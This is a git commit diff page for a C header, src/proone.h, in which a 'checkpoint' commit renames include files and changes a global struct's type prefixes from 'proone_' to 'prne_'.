diff options
author | David Timber <mieabby@gmail.com> | 2020-01-01 09:50:34 +1100 |
---|---|---|
committer | David Timber <mieabby@gmail.com> | 2020-01-01 09:50:34 +1100 |
commit | ed809a51fdd1c313cd256301ef6f7211e8394cb1 (patch) | |
tree | 81a3054ce0d42976f80c973e2b6ebf9c1b8b7476 /src/proone.h | |
parent | 6e456edb2757cf9d28d306afb836aa16780fb912 (diff) |
checkpoint
Diffstat (limited to 'src/proone.h')
-rw-r--r-- | src/proone.h | 14 |
1 files changed, 7 insertions, 7 deletions
diff --git a/src/proone.h b/src/proone.h index 49e9d9c..5911acf 100644 --- a/src/proone.h +++ b/src/proone.h @@ -1,20 +1,20 @@ -#include "proone_pack.h" -#include "proone_rnd.h" +#include "pack.h" +#include "rnd.h" #include <stdint.h> #include <stdbool.h> -struct proone_global { +struct prne_global { uint8_t *host_cred_data; size_t host_cred_size; bool has_proc_lim_lock; bool bin_ready; int caught_signal; - proone_rnd_engine_t *rnd; - proone_unpack_bin_archive_result_t bin_pack; - proone_bin_archive_t bin_archive; + prne_rnd_engine_t *rnd; + prne_unpack_bin_archive_result_t bin_pack; + prne_bin_archive_t bin_archive; }; -extern struct proone_global pne_global; +extern struct prne_global pne_g; |